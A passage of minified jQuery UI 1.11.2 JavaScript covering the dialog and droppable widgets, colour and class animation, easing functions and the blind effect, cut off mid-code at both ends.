"+this.options.dialogClass).hide().attr({tabIndex:-1,role:"dialog"}).appendTo(this._appendTo()),this._on(this.uiDialog,{keydown:function(t){if(this.options.closeOnEscape&&!t.isDefaultPrevented()&&t.keyCode&&t.keyCode===e.ui.keyCode.ESCAPE)return t.preventDefault(),this.close(t),void 0;
if(t.keyCode===e.ui.keyCode.TAB&&!t.isDefaultPrevented()){var i=this.uiDialog.find(":tabbable"),s=i.filter(":first"),n=i.filter(":last");t.target!==n[0]&&t.target!==this.uiDialog[0]||t.shiftKey?t.target!==s[0]&&t.target!==this.uiDialog[0]||!t.shiftKey||(this._delay(function(){n.focus()}),t.preventDefault()):(this._delay(function(){s.focus()}),t.preventDefault())}},mousedown:function(e){this._moveToTop(e)&&this._focusTabbable()}}),this.element.find("[aria-describedby]").length||this.uiDialog.attr({"aria-describedby":this.element.uniqueId().attr("id")})},_createTitlebar:function(){var t;this.uiDialogTitlebar=e("<div>").addClass("ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix").prependTo(this.uiDialog),this._on(this.uiDialogTitlebar,{mousedown:function(t){e(t.target).closest(".ui-dialog-titlebar-close")||this.uiDialog.focus()}}),this.uiDialogTitlebarClose=e("<button type='button'></button>").button({label:this.options.closeText,icons:{primary:"ui-icon-closethick"},text:!1}).addClass("ui-dialog-titlebar-close").appendTo(this.uiDialogTitlebar),this._on(this.uiDialogTitlebarClose,{click:function(e){e.preventDefault(),this.close(e)}}),t=e("<span>").uniqueId().addClass("ui-dialog-title").prependTo(this.uiDialogTitlebar),this._title(t),this.uiDialog.attr({"aria-labelledby":t.attr("id")})},_title:function(e){this.options.title||e.html("&#160;"),e.text(this.options.title)},_createButtonPane:function(){this.uiDialogButtonPane=e("<div>").addClass("ui-dialog-buttonpane ui-widget-content ui-helper-clearfix"),this.uiButtonSet=e("<div>").addClass("ui-dialog-buttonset").appendTo(this.uiDialogButtonPane),this._createButtons()},_createButtons:function(){var t=this,i=this.options.buttons;return this.uiDialogButtonPane.remove(),this.uiButtonSet.empty(),e.isEmptyObject(i)||e.isArray(i)&&!i.length?(this.uiDialog.removeClass("ui-dialog-buttons"),void 0):(e.each(i,function(i,s){var n,a;s=e.isFunction(s)?{click:s,text:i}:s,s=e.extend({type:"button"},s),n=s.click,s.click=function(){n.apply(t.element[0],arguments)},a={icons:s.icons,text:s.showText},delete s.icons,delete s.showText,e("<button></button>",s).button(a).appendTo(t.uiButtonSet)}),this.uiDialog.addClass("ui-dialog-buttons"),this.uiDialogButtonPane.appendTo(this.uiDialog),void 0)},_makeDraggable:function(){function t(e){return{position:e.position,offset:e.offset}}var i=this,s=this.options;this.uiDialog.draggable({cancel:".ui-dialog-content, .ui-dialog-titlebar-close",handle:".ui-dialog-titlebar",containment:"document",start:function(s,n){e(this).addClass("ui-dialog-dragging"),i._blockFrames(),i._trigger("dragStart",s,t(n))},drag:function(e,s){i._trigger("drag",e,t(s))},stop:function(n,a){var o=a.offset.left-i.document.scrollLeft(),r=a.offset.top-i.document.scrollTop();s.position={my:"left top",at:"left"+(o>=0?"+":"")+o+" "+"top"+(r>=0?"+":"")+r,of:i.window},e(this).removeClass("ui-dialog-dragging"),i._unblockFrames(),i._trigger("dragStop",n,t(a))}})},_makeResizable:function(){function t(e){return{originalPosition:e.originalPosition,originalSize:e.originalSize,position:e.position,size:e.size}}var i=this,s=this.options,n=s.resizable,a=this.uiDialog.css("position"),o="string"==typeof n?n:"n,e,s,w,se,sw,ne,nw";this.uiDialog.resizable({cancel:".ui-dialog-content",containment:"document",alsoResize:this.element,maxWidth:s.maxWidth,maxHeight:s.maxHeight,minWidth:s.minWidth,minHeight:this._minHeight(),handles:o,start:function(s,n){e(this).addClass("ui-dialog-resizing"),i._blockFrames(),i._trigger("resizeStart",s,t(n))},resize:function(e,s){i._trigger("resize",e,t(s))},stop:function(n,a){var o=i.uiDialog.offset(),r=o.left-i.document.scrollLeft(),h=o.top-i.document.scrollTop();s.height=i.uiDialog.height(),s.width=i.uiDialog.width(),s.position={my:"left top",at:"left"+(r>=0?"+":"")+r+" "+"top"+(h>=0?"+":"")+h,of:i.window},e(this).removeClass("ui-dialog-resizing"),i._unblockFrames(),i._trigger("resizeStop",n,t(a))}}).css("position",a)},_trackFocus:function(){this._on(this.widget(),{focusin:function(t){this._makeFocusTarget(),this._focusedElement=e(t.target)}})},_makeFocusTarget:function(){this._untrackInstance(),this._trackingInstances().unshift(this)},_untrackInstance:function(){var t=this._trackingInstances(),i=e.inArray(this,t);-1!==i&&t.splice(i,1)},_trackingInstances:function(){var e=this.document.data("ui-dialog-instances");return e||(e=[],this.document.data("ui-dialog-instances",e)),e},_minHeight:function(){var e=this.options;return"auto"===e.height?e.minHeight:Math.min(e.minHeight,e.height)},_position:function(){var e=this.uiDialog.is(":visible");e||this.uiDialog.show(),this.uiDialog.position(this.options.position),e||this.uiDialog.hide()},_setOptions:function(t){var i=this,s=!1,n={};e.each(t,function(e,t){i._setOption(e,t),e in i.sizeRelatedOptions&&(s=!0),e in i.resizableRelatedOptions&&(n[e]=t)}),s&&(this._size(),this._position()),this.uiDialog.is(":data(ui-resizable)")&&this.uiDialog.resizable("option",n)},_setOption:function(e,t){var i,s,n=this.uiDialog;"dialogClass"===e&&n.removeClass(this.options.dialogClass).addClass(t),"disabled"!==e&&(this._super(e,t),"appendTo"===e&&this.uiDialog.appendTo(this._appendTo()),"buttons"===e&&this._createButtons(),"closeText"===e&&this.uiDialogTitlebarClose.button({label:""+t}),"draggable"===e&&(i=n.is(":data(ui-draggable)"),i&&!t&&n.draggable("destroy"),!i&&t&&this._makeDraggable()),"position"===e&&this._position(),"resizable"===e&&(s=n.is(":data(ui-resizable)"),s&&!t&&n.resizable("destroy"),s&&"string"==typeof t&&n.resizable("option","handles",t),s||t===!1||this._makeResizable()),"title"===e&&this._title(this.uiDialogTitlebar.find(".ui-dialog-title")))},_size:function(){var e,t,i,s=this.options;this.element.show().css({width:"auto",minHeight:0,maxHeight:"none",height:0}),s.minWidth>s.width&&(s.width=s.minWidth),e=this.uiDialog.css({height:"auto",width:s.width}).outerHeight(),t=Math.max(0,s.minHeight-e),i="number"==typeof s.maxHeight?Math.max(0,s.maxHeight-e):"none","auto"===s.height?this.element.css({minHeight:t,maxHeight:i,height:"auto"}):this.element.height(Math.max(0,s.height-e)),this.uiDialog.is(":data(ui-resizable)")&&this.uiDialog.resizable("option","minHeight",this._minHeight())},_blockFrames:function(){this.iframeBlocks=this.document.find("iframe").map(function(){var t=e(this);return e("<div>").css({position:"absolute",width:t.outerWidth(),height:t.outerHeight()}).appendTo(t.parent()).offset(t.offset())[0]})},_unblockFrames:function(){this.iframeBlocks&&(this.iframeBlocks.remove(),delete this.iframeBlocks)},_allowInteraction:function(t){return e(t.target).closest(".ui-dialog").length?!0:!!e(t.target).closest(".ui-datepicker").length},_createOverlay:function(){if(this.options.modal){var t=!0;this._delay(function(){t=!1}),this.document.data("ui-dialog-overlays")||this._on(this.document,{focusin:function(e){t||this._allowInteraction(e)||(e.preventDefault(),this._trackingInstances()[0]._focusTabbable())}}),this.overlay=e("<div>").addClass("ui-widget-overlay ui-front").appendTo(this._appendTo()),this._on(this.overlay,{mousedown:"_keepFocus"}),this.document.data("ui-dialog-overlays",(this.document.data("ui-dialog-overlays")||0)+1)}},_destroyOverlay:function(){if(this.options.modal&&this.overlay){var e=this.document.data("ui-dialog-overlays")-1;e?this.document.data("ui-dialog-overlays",e):this.document.unbind("focusin").removeData("ui-dialog-overlays"),this.overlay.remove(),this.overlay=null}}}),e.widget("ui.droppable",{version:"1.11.2",widgetEventPrefix:"drop",options:{accept:"*",activeClass:!1,addClasses:!0,greedy:!1,hoverClass:!1,scope:"default",tolerance:"intersect",activate:null,deactivate:null,drop:null,out:null,over:null},_create:function(){var t,i=this.options,s=i.accept;this.isover=!1,this.isout=!0,this.accept=e.isFunction(s)?s:function(e){return e.is(s)},this.proportions=function(){return arguments.length?(t=arguments[0],void 0):t?t:t={width:this.element[0].offsetWidth,height:this.element[0].offsetHeight}},this._addToManager(i.scope),i.addClasses&&this.element.addClass("ui-droppable")},_addToManager:function(t){e.ui.ddmanager.droppables[t]=e.ui.ddmanager.droppables[t]||[],e.ui.ddmanager.droppables[t].push(this)},_splice:function(e){for(var t=0;e.length>t;t++)e[t]===this&&e.splice(t,1)},_destroy:function(){var t=e.ui.ddmanager.droppables[this.options.scope];this._splice(t),this.element.removeClass("ui-droppable ui-droppable-disabled")},_setOption:function(t,i){if("accept"===t)this.accept=e.isFunction(i)?i:function(e){return e.is(i)};else if("scope"===t){var s=e.ui.ddmanager.droppables[this.options.scope];this._splice(s),this._addToManager(i)}this._super(t,i)},_activate:function(t){var i=e.ui.ddmanager.current;this.options.activeClass&&this.element.addClass(this.options.activeClass),i&&this._trigger("activate",t,this.ui(i))},_deactivate:function(t){var i=e.ui.ddmanager.current;this.options.activeClass&&this.element.removeClass(this.options.activeClass),i&&this._trigger("deactivate",t,this.ui(i))},_over:function(t){var i=e.ui.ddmanager.current;i&&(i.currentItem||i.element)[0]!==this.element[0]&&this.accept.call(this.element[0],i.currentItem||i.element)&&(this.options.hoverClass&&this.element.addClass(this.options.hoverClass),this._trigger("over",t,this.ui(i)))},_out:function(t){var i=e.ui.ddmanager.current;i&&(i.currentItem||i.element)[0]!==this.element[0]&&this.accept.call(this.element[0],i.currentItem||i.element)&&(this.options.hoverClass&&this.element.removeClass(this.options.hoverClass),this._trigger("out",t,this.ui(i)))},_drop:function(t,i){var s=i||e.ui.ddmanager.current,n=!1;return s&&(s.currentItem||s.element)[0]!==this.element[0]?(this.element.find(":data(ui-droppable)").not(".ui-draggable-dragging").each(function(){var i=e(this).droppable("instance");return i.options.greedy&&!i.options.disabled&&i.options.scope===s.options.scope&&i.accept.call(i.element[0],s.currentItem||s.element)&&e.ui.intersect(s,e.extend(i,{offset:i.element.offset()}),i.options.tolerance,t)?(n=!0,!1):void 0}),n?!1:this.accept.call(this.element[0],s.currentItem||s.element)?(this.options.activeClass&&this.element.removeClass(this.options.activeClass),this.options.hoverClass&&this.element.removeClass(this.options.hoverClass),this._trigger("drop",t,this.ui(s)),this.element):!1):!1},ui:function(e){return{draggable:e.currentItem||e.element,helper:e.helper,position:e.position,offset:e.positionAbs}}}),e.ui.intersect=function(){function e(e,t,i){return e>=t&&t+i>e}return function(t,i,s,n){if(!i.offset)return!1;var a=(t.positionAbs||t.position.absolute).left+t.margins.left,o=(t.positionAbs||t.position.absolute).top+t.margins.top,r=a+t.helperProportions.width,h=o+t.helperProportions.height,l=i.offset.left,u=i.offset.top,d=l+i.proportions().width,c=u+i.proportions().height;switch(s){case"fit":return a>=l&&d>=r&&o>=u&&c>=h;case"intersect":return a+t.helperProportions.width/2>l&&d>r-t.helperProportions.width/2&&o+t.helperProportions.height/2>u&&c>h-t.helperProportions.height/2;case"pointer":return e(n.pageY,u,i.proportions().height)&&e(n.pageX,l,i.proportions().width);case"touch":return(o>=u&&c>=o||h>=u&&c>=h||u>o&&h>c)&&(a>=l&&d>=a||r>=l&&d>=r||l>a&&r>d);default:return!1}}}(),e.ui.ddmanager={current:null,droppables:{"default":[]},prepareOffsets:function(t,i){var s,n,a=e.ui.ddmanager.droppables[t.options.scope]||[],o=i?i.type:null,r=(t.currentItem||t.element).find(":data(ui-droppable)").addBack();e:for(s=0;a.length>s;s++)if(!(a[s].options.disabled||t&&!a[s].accept.call(a[s].element[0],t.currentItem||t.element))){for(n=0;r.length>n;n++)if(r[n]===a[s].element[0]){a[s].proportions().height=0;continue e}a[s].visible="none"!==a[s].element.css("display"),a[s].visible&&("mousedown"===o&&a[s]._activate.call(a[s],i),a[s].offset=a[s].element.offset(),a[s].proportions({width:a[s].element[0].offsetWidth,height:a[s].element[0].offsetHeight}))}},drop:function(t,i){var s=!1;return e.each((e.ui.ddmanager.droppables[t.options.scope]||[]).slice(),function(){this.options&&(!this.options.disabled&&this.visible&&e.ui.intersect(t,this,this.options.tolerance,i)&&(s=this._drop.call(this,i)||s),!this.options.disabled&&this.visible&&this.accept.call(this.element[0],t.currentItem||t.element)&&(this.isout=!0,this.isover=!1,this._deactivate.call(this,i)))}),s},dragStart:function(t,i){t.element.parentsUntil("body").bind("scroll.droppable",function(){t.options.refreshPositions||e.ui.ddmanager.prepareOffsets(t,i)})},drag:function(t,i){t.options.refreshPositions&&e.ui.ddmanager.prepareOffsets(t,i),e.each(e.ui.ddmanager.droppables[t.options.scope]||[],function(){if(!this.options.disabled&&!this.greedyChild&&this.visible){var s,n,a,o=e.ui.intersect(t,this,this.options.tolerance,i),r=!o&&this.isover?"isout":o&&!this.isover?"isover":null;r&&(this.options.greedy&&(n=this.options.scope,a=this.element.parents(":data(ui-droppable)").filter(function(){return e(this).droppable("instance").options.scope===n}),a.length&&(s=e(a[0]).droppable("instance"),s.greedyChild="isover"===r)),s&&"isover"===r&&(s.isover=!1,s.isout=!0,s._out.call(s,i)),this[r]=!0,this["isout"===r?"isover":"isout"]=!1,this["isover"===r?"_over":"_out"].call(this,i),s&&"isout"===r&&(s.isout=!1,s.isover=!0,s._over.call(s,i)))}})},dragStop:function(t,i){t.element.parentsUntil("body").unbind("scroll.droppable"),t.options.refreshPositions||e.ui.ddmanager.prepareOffsets(t,i)}},e.ui.droppable;var y="ui-effects-",b=e;e.effects={effect:{}},function(e,t){function i(e,t,i){var s=d[t.type]||{};return null==e?i||!t.def?null:t.def:(e=s.floor?~~e:parseFloat(e),isNaN(e)?t.def:s.mod?(e+s.mod)%s.mod:0>e?0:e>s.max?s.max:e)}function s(i){var s=l(),n=s._rgba=[];return i=i.toLowerCase(),f(h,function(e,a){var o,r=a.re.exec(i),h=r&&a.parse(r),l=a.space||"rgba";return h?(o=s[l](h),s[u[l].cache]=o[u[l].cache],n=s._rgba=o._rgba,!1):t}),n.length?("0,0,0,0"===n.join()&&e.extend(n,a.transparent),s):a[i]}function n(e,t,i){return i=(i+1)%1,1>6*i?e+6*(t-e)*i:1>2*i?t:2>3*i?e+6*(t-e)*(2/3-i):e}var a,o="backgroundColor borderBottomColor borderLeftColor borderRightColor borderTopColor color columnRuleColor outlineColor textDecorationColor textEmphasisColor",r=/^([\-+])=\s*(\d+\.?\d*)/,h=[{re:/rgba?\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,parse:function(e){return[e[1],e[2],e[3],e[4]]}},{re:/rgba?\(\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,parse:function(e){return[2.55*e[1],2.55*e[2],2.55*e[3],e[4]]}},{re:/#([a-f0-9]{2})([a-f0-9]{2})([a-f0-9]{2})/,parse:function(e){return[parseInt(e[1],16),parseInt(e[2],16),parseInt(e[3],16)]}},{re:/#([a-f0-9])([a-f0-9])([a-f0-9])/,parse:function(e){return[parseInt(e[1]+e[1],16),parseInt(e[2]+e[2],16),parseInt(e[3]+e[3],16)]}},{re:/hsla?\(\s*(\d+(?:\.\d+)?)\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,space:"hsla",parse:function(e){return[e[1],e[2]/100,e[3]/100,e[4]]}}],l=e.Color=function(t,i,s,n){return new e.Color.fn.parse(t,i,s,n)},u={rgba:{props:{red:{idx:0,type:"byte"},green:{idx:1,type:"byte"},blue:{idx:2,type:"byte"}}},hsla:{props:{hue:{idx:0,type:"degrees"},saturation:{idx:1,type:"percent"},lightness:{idx:2,type:"percent"}}}},d={"byte":{floor:!0,max:255},percent:{max:1},degrees:{mod:360,floor:!0}},c=l.support={},p=e("<p>")[0],f=e.each;p.style.cssText="background-color:rgba(1,1,1,.5)",c.rgba=p.style.backgroundColor.indexOf("rgba")>-1,f(u,function(e,t){t.cache="_"+e,t.props.alpha={idx:3,type:"percent",def:1}}),l.fn=e.extend(l.prototype,{parse:function(n,o,r,h){if(n===t)return this._rgba=[null,null,null,null],this;(n.jquery||n.nodeType)&&(n=e(n).css(o),o=t);var d=this,c=e.type(n),p=this._rgba=[];return o!==t&&(n=[n,o,r,h],c="array"),"string"===c?this.parse(s(n)||a._default):"array"===c?(f(u.rgba.props,function(e,t){p[t.idx]=i(n[t.idx],t)}),this):"object"===c?(n instanceof l?f(u,function(e,t){n[t.cache]&&(d[t.cache]=n[t.cache].slice())}):f(u,function(t,s){var a=s.cache;f(s.props,function(e,t){if(!d[a]&&s.to){if("alpha"===e||null==n[e])return;d[a]=s.to(d._rgba)}d[a][t.idx]=i(n[e],t,!0)}),d[a]&&0>e.inArray(null,d[a].slice(0,3))&&(d[a][3]=1,s.from&&(d._rgba=s.from(d[a])))}),this):t},is:function(e){var i=l(e),s=!0,n=this;return f(u,function(e,a){var o,r=i[a.cache];return r&&(o=n[a.cache]||a.to&&a.to(n._rgba)||[],f(a.props,function(e,i){return null!=r[i.idx]?s=r[i.idx]===o[i.idx]:t})),s}),s},_space:function(){var e=[],t=this;return f(u,function(i,s){t[s.cache]&&e.push(i)}),e.pop()},transition:function(e,t){var s=l(e),n=s._space(),a=u[n],o=0===this.alpha()?l("transparent"):this,r=o[a.cache]||a.to(o._rgba),h=r.slice();return s=s[a.cache],f(a.props,function(e,n){var a=n.idx,o=r[a],l=s[a],u=d[n.type]||{};null!==l&&(null===o?h[a]=l:(u.mod&&(l-o>u.mod/2?o+=u.mod:o-l>u.mod/2&&(o-=u.mod)),h[a]=i((l-o)*t+o,n)))}),this[n](h)},blend:function(t){if(1===this._rgba[3])return this;var i=this._rgba.slice(),s=i.pop(),n=l(t)._rgba;return l(e.map(i,function(e,t){return(1-s)*n[t]+s*e}))},toRgbaString:function(){var t="rgba(",i=e.map(this._rgba,function(e,t){return null==e?t>2?1:0:e});return 1===i[3]&&(i.pop(),t="rgb("),t+i.join()+")"},toHslaString:function(){var t="hsla(",i=e.map(this.hsla(),function(e,t){return null==e&&(e=t>2?1:0),t&&3>t&&(e=Math.round(100*e)+"%"),e});return 1===i[3]&&(i.pop(),t="hsl("),t+i.join()+")"},toHexString:function(t){var i=this._rgba.slice(),s=i.pop();return t&&i.push(~~(255*s)),"#"+e.map(i,function(e){return e=(e||0).toString(16),1===e.length?"0"+e:e}).join("")},toString:function(){return 0===this._rgba[3]?"transparent":this.toRgbaString()}}),l.fn.parse.prototype=l.fn,u.hsla.to=function(e){if(null==e[0]||null==e[1]||null==e[2])return[null,null,null,e[3]];var t,i,s=e[0]/255,n=e[1]/255,a=e[2]/255,o=e[3],r=Math.max(s,n,a),h=Math.min(s,n,a),l=r-h,u=r+h,d=.5*u;return t=h===r?0:s===r?60*(n-a)/l+360:n===r?60*(a-s)/l+120:60*(s-n)/l+240,i=0===l?0:.5>=d?l/u:l/(2-u),[Math.round(t)%360,i,d,null==o?1:o]},u.hsla.from=function(e){if(null==e[0]||null==e[1]||null==e[2])return[null,null,null,e[3]];var t=e[0]/360,i=e[1],s=e[2],a=e[3],o=.5>=s?s*(1+i):s+i-s*i,r=2*s-o;return[Math.round(255*n(r,o,t+1/3)),Math.round(255*n(r,o,t)),Math.round(255*n(r,o,t-1/3)),a]},f(u,function(s,n){var a=n.props,o=n.cache,h=n.to,u=n.from;l.fn[s]=function(s){if(h&&!this[o]&&(this[o]=h(this._rgba)),s===t)return this[o].slice();var n,r=e.type(s),d="array"===r||"object"===r?s:arguments,c=this[o].slice();return f(a,function(e,t){var s=d["object"===r?e:t.idx];null==s&&(s=c[t.idx]),c[t.idx]=i(s,t)}),u?(n=l(u(c)),n[o]=c,n):l(c)},f(a,function(t,i){l.fn[t]||(l.fn[t]=function(n){var a,o=e.type(n),h="alpha"===t?this._hsla?"hsla":"rgba":s,l=this[h](),u=l[i.idx];return"undefined"===o?u:("function"===o&&(n=n.call(this,u),o=e.type(n)),null==n&&i.empty?this:("string"===o&&(a=r.exec(n),a&&(n=u+parseFloat(a[2])*("+"===a[1]?1:-1))),l[i.idx]=n,this[h](l)))})})}),l.hook=function(t){var i=t.split(" ");f(i,function(t,i){e.cssHooks[i]={set:function(t,n){var a,o,r="";if("transparent"!==n&&("string"!==e.type(n)||(a=s(n)))){if(n=l(a||n),!c.rgba&&1!==n._rgba[3]){for(o="backgroundColor"===i?t.parentNode:t;(""===r||"transparent"===r)&&o&&o.style;)try{r=e.css(o,"backgroundColor"),o=o.parentNode}catch(h){}n=n.blend(r&&"transparent"!==r?r:"_default")}n=n.toRgbaString()}try{t.style[i]=n}catch(h){}}},e.fx.step[i]=function(t){t.colorInit||(t.start=l(t.elem,i),t.end=l(t.end),t.colorInit=!0),e.cssHooks[i].set(t.elem,t.start.transition(t.end,t.pos))}})},l.hook(o),e.cssHooks.borderColor={expand:function(e){var t={};return f(["Top","Right","Bottom","Left"],function(i,s){t["border"+s+"Color"]=e}),t}},a=e.Color.names={aqua:"#00ffff",black:"#000000",blue:"#0000ff",fuchsia:"#ff00ff",gray:"#808080",green:"#008000",lime:"#00ff00",maroon:"#800000",navy:"#000080",olive:"#808000",purple:"#800080",red:"#ff0000",silver:"#c0c0c0",teal:"#008080",white:"#ffffff",yellow:"#ffff00",transparent:[null,null,null,0],_default:"#ffffff"}}(b),function(){function t(t){var i,s,n=t.ownerDocument.defaultView?t.ownerDocument.defaultView.getComputedStyle(t,null):t.currentStyle,a={};if(n&&n.length&&n[0]&&n[n[0]])for(s=n.length;s--;)i=n[s],"string"==typeof n[i]&&(a[e.camelCase(i)]=n[i]);else for(i in n)"string"==typeof n[i]&&(a[i]=n[i]);return a}function i(t,i){var s,a,o={};for(s in i)a=i[s],t[s]!==a&&(n[s]||(e.fx.step[s]||!isNaN(parseFloat(a)))&&(o[s]=a));return o}var s=["add","remove","toggle"],n={border:1,borderBottom:1,borderColor:1,borderLeft:1,borderRight:1,borderTop:1,borderWidth:1,margin:1,padding:1};e.each(["borderLeftStyle","borderRightStyle","borderBottomStyle","borderTopStyle"],function(t,i){e.fx.step[i]=function(e){("none"!==e.end&&!e.setAttr||1===e.pos&&!e.setAttr)&&(b.style(e.elem,i,e.end),e.setAttr=!0)}}),e.fn.addBack||(e.fn.addBack=function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}),e.effects.animateClass=function(n,a,o,r){var h=e.speed(a,o,r);return this.queue(function(){var a,o=e(this),r=o.attr("class")||"",l=h.children?o.find("*").addBack():o;l=l.map(function(){var i=e(this);return{el:i,start:t(this)}}),a=function(){e.each(s,function(e,t){n[t]&&o[t+"Class"](n[t])})},a(),l=l.map(function(){return this.end=t(this.el[0]),this.diff=i(this.start,this.end),this}),o.attr("class",r),l=l.map(function(){var t=this,i=e.Deferred(),s=e.extend({},h,{queue:!1,complete:function(){i.resolve(t)}});return this.el.animate(this.diff,s),i.promise()}),e.when.apply(e,l.get()).done(function(){a(),e.each(arguments,function(){var t=this.el;e.each(this.diff,function(e){t.css(e,"")})}),h.complete.call(o[0])})})},e.fn.extend({addClass:function(t){return function(i,s,n,a){return s?e.effects.animateClass.call(this,{add:i},s,n,a):t.apply(this,arguments)}}(e.fn.addClass),removeClass:function(t){return function(i,s,n,a){return arguments.length>1?e.effects.animateClass.call(this,{remove:i},s,n,a):t.apply(this,arguments)}}(e.fn.removeClass),toggleClass:function(t){return function(i,s,n,a,o){return"boolean"==typeof s||void 0===s?n?e.effects.animateClass.call(this,s?{add:i}:{remove:i},n,a,o):t.apply(this,arguments):e.effects.animateClass.call(this,{toggle:i},s,n,a)}}(e.fn.toggleClass),switchClass:function(t,i,s,n,a){return e.effects.animateClass.call(this,{add:i,remove:t},s,n,a)}})}(),function(){function t(t,i,s,n){return e.isPlainObject(t)&&(i=t,t=t.effect),t={effect:t},null==i&&(i={}),e.isFunction(i)&&(n=i,s=null,i={}),("number"==typeof i||e.fx.speeds[i])&&(n=s,s=i,i={}),e.isFunction(s)&&(n=s,s=null),i&&e.extend(t,i),s=s||i.duration,t.duration=e.fx.off?0:"number"==typeof s?s:s in e.fx.speeds?e.fx.speeds[s]:e.fx.speeds._default,t.complete=n||i.complete,t}function i(t){return!t||"number"==typeof t||e.fx.speeds[t]?!0:"string"!=typeof t||e.effects.effect[t]?e.isFunction(t)?!0:"object"!=typeof t||t.effect?!1:!0:!0}e.extend(e.effects,{version:"1.11.2",save:function(e,t){for(var i=0;t.length>i;i++)null!==t[i]&&e.data(y+t[i],e[0].style[t[i]])},restore:function(e,t){var i,s;for(s=0;t.length>s;s++)null!==t[s]&&(i=e.data(y+t[s]),void 0===i&&(i=""),e.css(t[s],i))},setMode:function(e,t){return"toggle"===t&&(t=e.is(":hidden")?"show":"hide"),t},getBaseline:function(e,t){var i,s;switch(e[0]){case"top":i=0;break;case"middle":i=.5;break;case"bottom":i=1;break;default:i=e[0]/t.height}switch(e[1]){case"left":s=0;break;case"center":s=.5;break;case"right":s=1;break;default:s=e[1]/t.width}return{x:s,y:i}},createWrapper:function(t){if(t.parent().is(".ui-effects-wrapper"))return t.parent();var i={width:t.outerWidth(!0),height:t.outerHeight(!0),"float":t.css("float")},s=e("<div></div>").addClass("ui-effects-wrapper").css({fontSize:"100%",background:"transparent",border:"none",margin:0,padding:0}),n={width:t.width(),height:t.height()},a=document.activeElement;try{a.id}catch(o){a=document.body}return t.wrap(s),(t[0]===a||e.contains(t[0],a))&&e(a).focus(),s=t.parent(),"static"===t.css("position")?(s.css({position:"relative"}),t.css({position:"relative"})):(e.extend(i,{position:t.css("position"),zIndex:t.css("z-index")}),e.each(["top","left","bottom","right"],function(e,s){i[s]=t.css(s),isNaN(parseInt(i[s],10))&&(i[s]="auto")}),t.css({position:"relative",top:0,left:0,right:"auto",bottom:"auto"})),t.css(n),s.css(i).show()},removeWrapper:function(t){var i=document.activeElement;return t.parent().is(".ui-effects-wrapper")&&(t.parent().replaceWith(t),(t[0]===i||e.contains(t[0],i))&&e(i).focus()),t},setTransition:function(t,i,s,n){return n=n||{},e.each(i,function(e,i){var a=t.cssUnit(i);a[0]>0&&(n[i]=a[0]*s+a[1])}),n}}),e.fn.extend({effect:function(){function i(t){function i(){e.isFunction(a)&&a.call(n[0]),e.isFunction(t)&&t()}var n=e(this),a=s.complete,r=s.mode;(n.is(":hidden")?"hide"===r:"show"===r)?(n[r](),i()):o.call(n[0],s,i)}var s=t.apply(this,arguments),n=s.mode,a=s.queue,o=e.effects.effect[s.effect];return e.fx.off||!o?n?this[n](s.duration,s.complete):this.each(function(){s.complete&&s.complete.call(this)}):a===!1?this.each(i):this.queue(a||"fx",i)},show:function(e){return function(s){if(i(s))return e.apply(this,arguments);var n=t.apply(this,arguments);return n.mode="show",this.effect.call(this,n)}}(e.fn.show),hide:function(e){return function(s){if(i(s))return e.apply(this,arguments);var n=t.apply(this,arguments);return n.mode="hide",this.effect.call(this,n)}}(e.fn.hide),toggle:function(e){return function(s){if(i(s)||"boolean"==typeof s)return e.apply(this,arguments);var n=t.apply(this,arguments);return n.mode="toggle",this.effect.call(this,n)}}(e.fn.toggle),cssUnit:function(t){var i=this.css(t),s=[];return e.each(["em","px","%","pt"],function(e,t){i.indexOf(t)>0&&(s=[parseFloat(i),t])}),s}})}(),function(){var t={};e.each(["Quad","Cubic","Quart","Quint","Expo"],function(e,i){t[i]=function(t){return Math.pow(t,e+2)}}),e.extend(t,{Sine:function(e){return 1-Math.cos(e*Math.PI/2)},Circ:function(e){return 1-Math.sqrt(1-e*e)},Elastic:function(e){return 0===e||1===e?e:-Math.pow(2,8*(e-1))*Math.sin((80*(e-1)-7.5)*Math.PI/15)},Back:function(e){return e*e*(3*e-2)},Bounce:function(e){for(var t,i=4;((t=Math.pow(2,--i))-1)/11>e;);return 1/Math.pow(4,3-i)-7.5625*Math.pow((3*t-2)/22-e,2)}}),e.each(t,function(t,i){e.easing["easeIn"+t]=i,e.easing["easeOut"+t]=function(e){return 1-i(1-e)},e.easing["easeInOut"+t]=function(e){return.5>e?i(2*e)/2:1-i(-2*e+2)/2}})}(),e.effects,e.effects.effect.blind=function(t,i){var s,n,a,o=e(this),r=/up|down|vertical/,h=/up|left|vertical|horizontal/,l=["position","top","bottom","left","right","height","width"],u=e.effects.setMode(o,t.mode||"hide"),d=t.direction||"up",c=r.test(d),p=c?"height":"width",f=c?"top":"left",m=h.test(d),g={},v="show"===u;o.parent().is(".ui-effects-wrapper")?e.effects.save(o.parent(),l):e.effects.save(o,l),o.show(),s=e.effects.createWrapper(o).css({overflow:"hidden"}),n=s[p](),a=parseFloat(s.css(f))||0,g[p]=v?n:0,m||(o.css(c?"bottom":"right",0).css(c?"top":"left","auto").css({position:"absolute"}),g[f]=v?a:n+a),v&&(s.css(p,0),m||s.css(f,a+n)),s.animate(g,{duration:t.duration,easing:t.easing,queue:!1,complete:function(){"hide"===u&&o.hide(),e.effects.restore(o,l),e.effects.removeWrapper(o),i()}})},e.effects.effect.bounce=function(t,i){var 